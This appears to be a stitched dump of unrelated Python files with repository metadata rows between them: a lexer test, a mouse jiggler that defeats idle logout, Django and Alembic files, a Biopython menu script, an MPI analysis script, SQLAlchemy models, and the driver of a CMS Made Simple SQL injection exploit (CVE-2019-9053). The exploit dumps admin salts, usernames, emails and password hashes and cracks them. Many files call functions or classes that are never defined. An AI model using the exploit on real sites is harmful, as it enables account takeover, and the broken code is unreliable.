# Test lex
# `lexer` comes from the star import of ACOW above; feeding it input and
# iterating yields the token stream.
print('\nLex Test:')
lexer.input(data)
for tok in lexer:
    print(tok)
# Test parser
# `parser` also comes from ACOW; parse() returns the parse result for `data`.
print('\nParser Test:')
result = parser.parse(data)
print(result) | 13.7 | 27 | 0.645985 |
49caba94d9ddd16a821b2ba8d9ea2e815b9e25e0 | 1,292 | py | Python | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | code.py | RanaTe/AntiLogOut | 0d970f6202fb16be469de6a98c45c0cfb4b910f0 | [
"OML"
] | null | null | null | import board
import time
import random
import usb_hid
from adafruit_hid.mouse import Mouse
from adafruit_hid.keyboard import Keyboard
# Present the board as a USB HID mouse and run forever: alternate one large
# left/right move with a burst of small moves + left clicks, then sleep.
mouse = Mouse(usb_hid.devices)
goright=True
while True:
    #2 parts to sequence, move mostly right, then mostly left
    # set up for big move
    #longwait=random.randint(250,350)
    longwait=random.randint(2,3)
    # Random jitter added to the big move so it is not perfectly repetitive.
    bigoffsetx=random.randint(-10,10)
    bigoffsety=random.randint(-7,7)
    # do 1st big move
    if goright:
        # do a right move
        print("moving right")
        mouse.move(100+bigoffsetx,bigoffsety)
        goright=False
    else:
        # do a left move
        print("moving left")
        mouse.move(-100+bigoffsetx,bigoffsety)
        goright=True
    # do some quick clicks and moves
    numberofclicks=random.randint(3,6)
    print("doing some clicks")
    # NOTE(review): range(1, n) performs n-1 iterations, so this clicks one
    # time fewer than `numberofclicks` -- confirm the off-by-one is intended.
    for ismall in range(1,numberofclicks):
        # shortwait in seconds (randint gives ms, scaled by 0.001; a double
        # click is usually less than 500 ms, so stay above that)
        shortwait=0.001*random.randint(250,600)
        #print(shortwait)
        shortmovex=random.randint(-9,9)
        shortmovey=random.randint(-7,7)
        #move, wait, click
        mouse.move(shortmovex,shortmovey)
        time.sleep(shortwait)
        mouse.click(Mouse.LEFT_BUTTON)
    # Pause 2-3 s before the next big move.
    time.sleep(longwait)
    print("waiting for next move")
| 25.84 | 66 | 0.666409 |
49cc558662f5dd7e7fb056fd6f79d57effb78d66 | 315 | py | Python | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | null | null | null | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | 3 | 2021-03-30T13:54:34.000Z | 2021-09-08T02:17:46.000Z | insta/admin.py | Stephenremmi/insta-clone | 88af361dca160f7840842ebebc306a02f97920ca | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post, Comment, UserProfile
# Register your models here.
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(UserProfile, admin_class=ProfileAdmin)
| 26.25 | 58 | 0.796825 |
49cd3c2fd0bbd8a92289c21bd54ca7e440919719 | 25,042 | py | Python | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | travelling/migrations/0001_initial.py | HerbyDE/jagdreisencheck-webapp | 9af5deda2423b787da88a0c893f3c474d8e4f73f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-27 14:43
from __future__ import unicode_literals
import ckeditor.fields
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
import jagdreisencheck.custom_fields
| 83.473333 | 349 | 0.633376 |
49ce339e404139f63103f0e97e83fc72d1aded23 | 15,097 | py | Python | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | bio2.py | phenolophthaleinum/BioPython | 67be63e69f136134ca8cb41676700c97da7a2006 | [
"MIT"
] | null | null | null | from Bio.SeqIO import parse
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from Bio.Alphabet import IUPAC, generic_dna
from Bio import Alphabet, Entrez
from Bio.SeqUtils import GC
from Bio.Blast import NCBIWWW, NCBIXML
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from Bio import motifs
__author__ = 'Maciej Michalczyk'
__version__ = '09122019'  # date-stamp style version, presumably DDMMYYYY -- confirm
# def convertFASTAtoGENBANK(self, filename):
# file = open(filename + ".fasta")
# record = SeqIO.read(file, "fasta")
# record.seq.alphabet = generic_dna
# file_genbank = open(filename + ".gbk", "w")
# SeqIO.write(record, file_genbank, "genbank")
# file_genbank.close()
# file.close()
# Interactive console menu.  `session` is a CurrentSession (defined earlier in
# this file) that holds the loaded FASTA record and wraps the Bio.* helpers.
# Most options require `filename` to have been set by option 1 or 7 first; the
# broad `except Exception` handlers report "File is not loaded." otherwise.
if __name__ == '__main__':
    session = CurrentSession()
    while True:
        # Option 8 is disabled (marked with *); its handler body is commented
        # out further down.
        print("""////Bio Python////
        1. Load FASTA file
        2. Load record info
        3. Get complementary sequence
        4. Transcribe sequence
        5. Translate sequence
        6. Get GC content
        7. Fetch and load FASTA from Entrez
        *8. Convert FASTA to GenBank
        9. Run BLAST
        10. Perform pairwise aligment
        11. Create motifs and weblogo
        12. Save your actions made on FASTA file to txt file
        13. Print sequence substrings
        === Current session file: {} ===
        Type 'help' for help.
        Type 'quit' to exit.""".format(session.file_session))
        menu_pos = input('>>').lower()
        if menu_pos == str(1):
            # Load a FASTA file; remembers `filename` for later options.
            try:
                print("Type name of FASTA file to process: ")
                filename = input()
                file_handle = session.openFile(filename)
                print("FASTA loaded!")
            except Exception as e:
                print("No such file or directory.")
        elif menu_pos == str(2):
            try:
                file_handle = session.openFile(filename)
                session.getSequenceInfo(file_handle)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(3):
            try:
                file_handle = session.openFile(filename)
                session.getComplementarySequence(file_handle)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(4):
            try:
                file_handle = session.openFile(filename)
                session.transcribeSequence(file_handle)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(5):
            # `stop` ("y"/"n") controls translation up to the first stop codon.
            stop = input('Stop translating at first stop codon? [y/n]').lower()
            try:
                file_handle = session.openFile(filename)
                session.translateSequence(file_handle, stop)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(6):
            try:
                file_handle = session.openFile(filename)
                session.get_GC_Content(file_handle)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(7):
            # Download a record from an Entrez database and load it.
            try:
                db = input("Type database name: ").lower()
                accession = input("Type accession to find: ")
                filename = session.fetchRecord(db, accession)
                file_handle = session.openFile(filename)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(8):
            # Disabled: conversion helper is commented out near the top of
            # this file, so this branch only prompts and discards the input.
            try:
                print("Type name of FASTA file to process: ")
                filename = input()
                # session.convertFASTAtoGENBANK(filename)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(9):
            try:
                file_handle = session.openFile(filename)
                # NOTE(review): `type` shadows the builtin here; local to this
                # branch, but worth renaming if this code is ever reworked.
                type = input("Type the type of BLAST: ")
                database = input("Type database name: ")
                session.runBlast(type, database)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(10):
            try:
                print("""Choose type of aligment:
                1. Global Pairwise (default parameters)
                2. Local Pairwise (default parameters)
                3. Global Pairwise with custom parameters""")
                alignment_type = input('>>')
                file_handle = session.openFile(filename)
                session.alignPairwise(file_handle, alignment_type)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded.")
        elif menu_pos == str(11):
            try:
                file_handle = session.openFile(filename)
                session.createMotif(file_handle)
                session.closeFile(file_handle)
            except Exception as e:
                print("File is not loaded")
        elif menu_pos == str(12):
            session.saveActions()
        elif menu_pos == str(13):
            # Print the sequence, then its substrings staggered one column to
            # the right each line.  Each loop pass prints two substrings (one
            # via the loop variable, one via next()), so the iterator is
            # consumed twice per iteration until StopIteration ends it.
            try:
                length = int(input("Length of substrings:"))
                iterator = session.getElems(length)
                print(session.sequence)
                i = 0
                for base in iterator:
                    print(' ' * i + base)
                    i += 1
                    print(' ' * i + next(iterator))
                    i += 1
            except StopIteration:
                pass
            except Exception as e:
                print("File is not loaded")
        elif menu_pos == 'debug':
            # Hidden option: dump the cached session fields.
            print("{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(session.id, session.name,
                                                            session.desc,session.sequence,
                                                            session.comp_seq, session.transcribed_seq,
                                                            session.translated_seq, session.gc_perc))
        elif menu_pos == 'quit':
            break
        elif menu_pos == 'help':
            print("""
            quickHELP:
            Indent operations in menu needs file to be opened first.
            Be patient while doing BLAST.
            If in menu something is marked with an asterisk, then it is not usable.
            Have fun!
            """)
        else:
            print("Unknown command.")
| 39.111399 | 110 | 0.540703 |
49cfbdd139a2858864f15766804aa976f1344306 | 6,456 | py | Python | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | null | null | null | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | null | null | null | room/easyctf/exploit/46635.py | danieldavidson/tryhackme-ctf | f42362609ffb72151f7056371e6ad7207e42c8c5 | [
"MIT"
] | 1 | 2022-03-11T22:55:33.000Z | 2022-03-11T22:55:33.000Z | #!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
# Command-line options (Python 2 script).
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()

# A target URL is mandatory; otherwise print usage hints and exit.
if not options.url:
    print "[+] Specify an url target"
    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
    exit()

# Module-level state shared with the dump_*/crack_* routines defined above.
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
    print colored("[*] Now try to crack password")
    crack_password()
beautify_print() | 34.709677 | 189 | 0.586431 |
49d510eb8a62e95ceab2defdd45b0de37d252639 | 968 | py | Python | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | module3-nosql-and-document-oriented-databases/rpg_mongo.py | Dpgofast/DS-Unit-3-Sprint-2-SQL-and-Databases | f78bb4c67a182dd3c96ffdca1175d888239f2099 | [
"MIT"
] | null | null | null | import pymongo
client = pymongo.MongoClient('''mongodb://dakotapope:passwrd@
cluster0-shard-00-00-iaoct.mongodb.net:27017,cluster0-shard-00
-01-iaoct.mongodb.net:27017,cluster0-shard-00-02-iaoct.mongodb.
net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=
admin&retryWrites=true''')
# investigate the databases already initialized
client.database_names()
# -->['rpg_data', 'test', 'admin', 'local']
# since I created the table on the Mongo Atlas dashboard I wil use it here
rpgs = client.rpg_data.rpg
# loadout the json file to prep for dumping into a mongo db table
with open('''C:/Users/dakot/Documents/GitHub/DS-Unit-3-Sprint-2-SQL-and-
Databases/module3-nosql-and-document-oriented-databases/rpg.json''') as f:
file_data = json.load(f)
# make a space for the data to go
rpg_table = rpg['rpg_data']
# Dump the json data into the mongodb cloud.
rpg_table.insert_many(file_data)
# <pymongo.results.InsertManyResult at 0x2c80a7c8688>
# And DONE!
| 34.571429 | 74 | 0.764463 |
49d5165d59fc22ca8bcab148e06413fa005d535e | 2,799 | py | Python | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | convertPP.py | Harry93x/FinancialToolbox | d34ef96d66b7447332d8f977da8fa9abc43cc981 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import xlrd
import csv
import sys
import getopt
# input configuration: column positions in the source rows -- presumably
# 0-based indices into each spreadsheet/CSV row (confirm against the reader).
iColDate = 0
iColTransactionType = 1
iColAmount = 3
iColDescription = 6
# Only rows matching this transaction type / description are of interest.
transactionType = 'Repayment'
descriptionType = 'Interest'
#output configuration (German column headers, semicolon-delimited output)
outHeader = ['Datum', 'Typ', 'Wert']
outType = 'Zinsen'
outDelimiter = ';'

# `main` is defined earlier in this file; forward CLI args without argv[0].
if __name__ == "__main__":
    main(sys.argv[1:])
| 29.15625 | 198 | 0.649875 |
49d5fecaf1e79a501de0719400a144c921ff2ac0 | 1,096 | py | Python | lib/python3.7/site-packages/vine/__init__.py | nguyentranhoan/uit-mobile | 8546312b01373d94cf00c64f7eacb769e0f4ccce | [
"BSD-3-Clause"
] | 13 | 2018-03-28T23:07:01.000Z | 2022-03-12T06:01:21.000Z | newenv/lib/python3.8/site-packages/vine/__init__.py | palakshivlani-11/cryptorium | eebb78c061007519e527b3d18b8df6bc13679c46 | [
"Apache-2.0"
] | 13 | 2020-03-24T17:53:51.000Z | 2022-02-10T20:01:14.000Z | newenv/lib/python3.8/site-packages/vine/__init__.py | palakshivlani-11/cryptorium | eebb78c061007519e527b3d18b8df6bc13679c46 | [
"Apache-2.0"
] | 5 | 2018-03-28T23:07:05.000Z | 2021-12-09T19:02:00.000Z | """Promises, promises, promises."""
from __future__ import absolute_import, unicode_literals
import re
from collections import namedtuple
from .abstract import Thenable
from .promises import promise
from .synchronization import barrier
from .funtools import (
maybe_promise, ensure_promise,
ppartial, preplace, starpromise, transform, wrap,
)
__version__ = '1.3.0'
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://github.com/celery/vine'
__docformat__ = 'restructuredtext'

# -eof meta-

#: Named tuple holding the parsed components of ``__version__``.
version_info_t = namedtuple('version_info_t', (
    'major', 'minor', 'micro', 'releaselevel', 'serial',
))

# bump version can only search for {current_version}
# so we have to parse the version here.
# FIX: the separator between the minor and micro numbers was an unescaped
# '.' (which matches any character); escape it so only a literal dot counts.
_temp = re.match(
    r'(\d+)\.(\d+)\.(\d+)(.+)?', __version__).groups()
VERSION = version_info = version_info_t(
    int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '')
# Drop the parsing helpers from the module namespace.
del(_temp)
del(re)

__all__ = [
    'Thenable', 'promise', 'barrier',
    'maybe_promise', 'ensure_promise',
    'ppartial', 'preplace', 'starpromise', 'transform', 'wrap',
]
| 26.095238 | 68 | 0.699818 |
49d6bd8f68e9b38cfe513863c74dbe676a8959d2 | 1,965 | py | Python | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
] | 4 | 2019-06-18T15:26:49.000Z | 2021-08-11T18:57:39.000Z | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
] | 2 | 2019-08-22T20:11:46.000Z | 2019-08-22T22:35:17.000Z | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
] | 4 | 2019-07-06T15:41:53.000Z | 2021-01-27T17:59:13.000Z | #!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from LLC_Membranes.timeseries.forecast_ctrw import System
from LLC_Membranes.llclib import file_rw
import names
residues = ["GCL", "SOH"]
wt = 10
path = "/home/bcoscia/Documents/Gromacs/Transport/NaGA3C11"
colors = ['blue', 'red']
opacity = 1
nbins = 25
lw = 2
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
for j, r in enumerate(residues):
obj = file_rw.load_object('%s/%s/%swt/forecast_%s.pl' % (path, r, wt, r))
hops = []
for i in obj.hop_lengths:
hops += i
print(max(hops))
if j == 0:
hop_hist, edges = np.histogram(hops, density=True, bins=nbins)
bounds = [edges[0], edges[-1]]
else:
hop_hist, edges = np.histogram(hops, density=True, bins=np.linspace(bounds[0], bounds[1], nbins + 1))
hop_outline = np.zeros([len(hop_hist)*2 + 2, 2])
hop_outline[::2, 0] = edges
hop_outline[1::2, 0] = edges
hop_outline[1:-1:2, 1] = hop_hist
hop_outline[2:-1:2, 1] = hop_hist
if j == 0:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=nbins)
bounds_power = [edges[0], edges[-1]]
else:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=np.linspace(bounds_power[0], bounds_power[1], nbins + 1))
dwell_outline = np.zeros([len(dwell_hist)*2 + 2, 2])
dwell_outline[::2, 0] = edges
dwell_outline[1::2, 0] = edges
dwell_outline[1:-1:2, 1] = dwell_hist
dwell_outline[2:-1:2, 1] = dwell_hist
ax[0].plot(hop_outline[:, 0], hop_outline[:, 1], color=colors[j], alpha=opacity, linewidth=lw)
ax[1].plot(dwell_outline[:, 0], dwell_outline[:, 1], color=colors[j], alpha=opacity, label=names.res_to_name[r], linewidth=lw)
ax[0].tick_params(labelsize=14)
ax[1].tick_params(labelsize=14)
ax[1].legend(fontsize=14)
ax[0].set_ylabel('Frequency', fontsize=14)
ax[0].set_xlabel('Hop Length (nm)', fontsize=14)
ax[1].set_xlabel('Dwell Time (ns)', fontsize=14)
plt.tight_layout()
plt.savefig('dwell_hop_%s.pdf' % '_'.join(residues))
plt.show()
| 32.213115 | 128 | 0.692112 |
49d70088af3c73de71bed44ae91ad6608da6929f | 1,275 | py | Python | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null |
start_time=[]
end_time=[]
query_time=0
students_count=0
string_to_list('start time : ',start_time)
string_to_list('end time : ',end_time)
query_time=int(input('query time : '))
if not(1<=len(start_time)<=100):
print('start time list out of range')
exit()
elif not(1<=len(end_time)<=100):
print('end time list out of range')
exit()
elif len(start_time)!=len(end_time):
print('length of lists start and end are not the same')
exit()
elif not(1<=query_time<=1000):
print('query time out of range')
exit()
for i in range(len(start_time)):
if not(1<=start_time[i]<=1000):
print(f'start time [{i}] out of range')
exit()
elif not(1<=end_time[i]<=1000):
print(f'end time [{i}] out of range')
exit()
if start_time[i]<=end_time[i]:
temp=end_time[i]-start_time[i]
if temp>=query_time:
students_count+=1
print(students_count) | 24.519231 | 59 | 0.542745 |
49d77fe266bda3b95de391977fa5e234a79bc1d6 | 3,000 | py | Python | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 7 | 2018-05-20T08:56:08.000Z | 2022-03-11T15:50:54.000Z | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 2 | 2021-06-08T21:12:51.000Z | 2022-01-13T01:25:27.000Z | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 5 | 2016-10-09T14:52:09.000Z | 2020-12-25T01:04:35.000Z | """Added tariff
Revision ID: 4dbaa3104f4
Revises: 1d6f96d1df
Create Date: 2015-05-27 16:00:09.343862
"""
# revision identifiers, used by Alembic.
revision = '4dbaa3104f4'        # identifier of this migration
down_revision = '1d6f96d1df'    # parent migration this one applies on top of
branch_labels = None            # not the start of a named branch
depends_on = None               # no cross-branch dependencies
from alembic import op
import sqlalchemy as sa
| 32.967033 | 85 | 0.685667 |
49da0b5cb2458b175611bedd60d99e1e2e8ba045 | 4,970 | py | Python | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | #imports
import os
import subprocess
from colorama import init,Fore, Back, Style
import asyncio
import urllib.parse
import time
from time import perf_counter
# Enable colorama's Windows ANSI-escape conversion.
init(convert=True)
#vars -- module-level state shared by the helper functions defined below.
ver = "Beta, Lots of commits going on!"
ping = 0          # measured ping, set later by setupPing()
pings = []
tempping = 0
searches = 0      # number of searches, set later by setupSearches()
base = 300
delay = 0         # computed result, set later by calc()
gotQ = ""
dropTime = 0
reqTime = 0
#funcs
#THIS PING CHECK CODE IS FROM kingscratss#3407 on discord!!
#cool ascii text thing/creds
os.system("cls")
print(Fore.LIGHTBLUE_EX + '''
''')
print(Fore.LIGHTBLUE_EX + " By Mythological, Version: " + ver)
print()
print()
# assign vars -- setupPing/setupSearches prompt-or-measure the inputs
# (defined earlier in this file).
ping = setupPing()
searches = setupSearches()
# compute the delay and print the results
delay = calc()
out()
| 37.938931 | 217 | 0.567203 |
49da88047bb20d46e7f9d9dfc0e2238764393527 | 10,360 | py | Python | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
#
# calc_qual.py
#
# A program to calculate the quality factors and magnetic angle within some defined region
# of an Athena++ disk using MPI
#
# To run:
# mpirun -n [n] python calc_qual.py [options]
# for [n] cores.
#
import numpy as np
import os
import sys
sys.path.insert(0, '/home/per29/rds/rds-accretion-zyNhkonJSR8/athena-analysis/dependencies')
#sys.path.insert(0, '/Users/paytonrodman/athena-sim/athena-analysis/dependencies')
import athena_read
import AAT
import glob
import re
import csv
import scipy.stats as st
import argparse
from math import sqrt
from mpi4py import MPI
# Execute main function
if __name__ == '__main__':
    # Command-line interface; each option name must match a parameter of
    # main() (defined above), since the parsed namespace is forwarded as
    # keyword arguments.
    parser = argparse.ArgumentParser(description='Calculate various quality factors from raw simulation data.')
    parser.add_argument('prob_id',
                        help='base name of the data being analysed, e.g. inflow_var or disk_base')
    parser.add_argument('-u', '--update',
                        action="store_true",
                        help='specify whether the results being analysed are from a restart')
    # Radial and polar bounds of the analysis region; None lets main() apply
    # the defaults quoted in the help strings.
    parser.add_argument('-rl', '--r_lower',
                        type=float,
                        default=None,
                        help='value of lower r bound of region being analysed, must be between x1min and x1max (default=5)')
    parser.add_argument('-ru', '--r_upper',
                        type=float,
                        default=None,
                        help='value of upper r bound of region being analysed, must be between x1min and x1max (default=100)')
    parser.add_argument('-tl', '--theta_lower',
                        type=float,
                        default=None,
                        help='value of lower theta bound of region being analysed, must be between x2min and x2max (default=0.982)')
    parser.add_argument('-tu', '--theta_upper',
                        type=float,
                        default=None,
                        help='value of upper theta bound of region being analysed, must be between x2min and x2max (default=2.159)')
    args = parser.parse_args()
    # Forward every parsed option to main() by keyword.
    main(**vars(args))
| 40.948617 | 175 | 0.598359 |
49db3a1ecbfa19102c7269a3533f50d40a8b3fab | 4,838 | py | Python | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, String, Integer, Text, Boolean, DateTime
from config.access import Base
from sqlalchemy.ext.declarative import declared_attr
from datetime import datetime
def export(self):
    """Export hook; currently a no-op placeholder that returns None.

    NOTE(review): takes ``self`` -- presumably a method of a mixin whose
    class statement is not visible in this chunk; confirm in the full file.
    """
    pass
class AccessAuthor(Base, BaseFunctions):
    """
    Author model: one row per source/author in the Access "Author" table.

    NOTE(review): unlike the other models in this module, the columns here
    do not specify explicit Access column names -- confirm the attribute
    names match the table's actual column names.
    """
    __tablename__ = "Author"
    sort_name = "Author"
    id = Column(Integer, primary_key=True)
    # Short unique code identifying the author.
    abbreviation = Column(String(64), unique=True, nullable=False)
    full_name = Column(String(64))
    notes = Column(String(128))
class AccessDefinition(Base, BaseFunctions):
    """Definition model: one definition of a word ("WordDefinition" table)."""
    __tablename__ = 'WordDefinition'
    sort_name = "Definition"
    word_id = Column("WID", Integer)  # id of the word this definition belongs to
    position = Column("I", Integer, nullable=False)  # ordinal among the word's definitions
    usage = Column("Usage", String(64))
    grammar = Column("Grammar", String(8))
    body = Column("Definition", Text, nullable=False)  # the definition text itself
    main = Column("Main", String(8))
    case_tags = Column("Tags", String(16))
    id = Column("id", Integer, primary_key=True)
class AccessEvent(Base, BaseFunctions):
    """
    Event model: a lexical event in the Access "LexEvent" table.
    """
    __tablename__ = "LexEvent"
    sort_name = "Event"
    id = Column("EVT", Integer, primary_key=True)
    name = Column("Event", String(64), nullable=False)
    # Stored as text, not a date type, in the Access schema.
    date = Column("When", String(32), nullable=False)
    definition = Column("WhyWhat", Text, nullable=False)
    annotation = Column("DictionaryAnnotation", String(16))
    suffix = Column("FilenameSuffix", String(16))
class AccessSetting(Base, BaseFunctions):
    """
    Setting model: database metadata snapshot ("Settings" table).
    """
    __tablename__ = "Settings"
    sort_name = "Settings"
    # Modification timestamp doubles as the primary key.
    date = Column("DateModified", DateTime, primary_key=True)
    db_version = Column("DBVersion", Integer, nullable=False)
    last_word_id = Column("LastWID", Integer, nullable=False)  # highest word id issued so far
    db_release = Column("DBRelease", String(16), nullable=False)
class AccessSyllable(Base, BaseFunctions):
    """
    Syllable model ("Syllable" table).

    NOTE(review): both `id` and `name` are declared primary_key=True, which
    SQLAlchemy interprets as a composite primary key (id, characters) --
    confirm that is intended rather than `id` alone.
    """
    __tablename__ = "Syllable"
    sort_name = "Syllable"
    id = Column(Integer, primary_key=True, autoincrement=True)
    name = Column("characters", String(8), primary_key=True)
    # Shadows the builtin `type`; kept for schema/API compatibility.
    type = Column(String(32), nullable=False)
    allowed = Column(Boolean)
class AccessType(Base, BaseFunctions):
    """
    Type model: a word-type classification ("Type" table).
    """
    __tablename__ = "Type"
    sort_name = "Type"
    id = Column(Integer, primary_key=True)
    # Shadows the builtin `type`; kept for schema/API compatibility.
    type = Column(String(16), nullable=False)
    type_x = Column(String(16), nullable=False)  # extended type name
    group = Column(String(16), nullable=False)
    parentable = Column(Boolean, nullable=False)  # whether words of this type may have parents
    description = Column(String(255), nullable=True)
class AccessWord(Base, BaseFunctions):
    """
    Word model: one dictionary word ("Words" table).
    """
    __tablename__ = "Words"
    sort_name = "Word"
    word_id = Column("WID", Integer, nullable=False, primary_key=True)
    # Shadows the builtin `type`; kept for schema/API compatibility.
    type = Column("Type", String(16), nullable=False)
    type_x = Column("XType", String(16), nullable=False)
    affixes = Column("Affixes", String(16))
    match = Column("Match", String(8))
    authors = Column("Source", String(64))
    year = Column("Year", String(128))
    rank = Column("Rank", String(128))
    origin = Column("Origin", String(128))
    origin_x = Column("OriginX", String(64))
    used_in = Column("UsedIn", Text)
    TID_old = Column("TID", Integer)  # references
class AccessWordSpell(Base, BaseFunctions):
    """WordSpell model: a spelling of a word over an event range ("WordSpell" table)."""
    __tablename__ = "WordSpell"
    sort_name = "WordSpell"
    word_id = Column("WID", Integer, nullable=False)  # id of the word this spelling belongs to
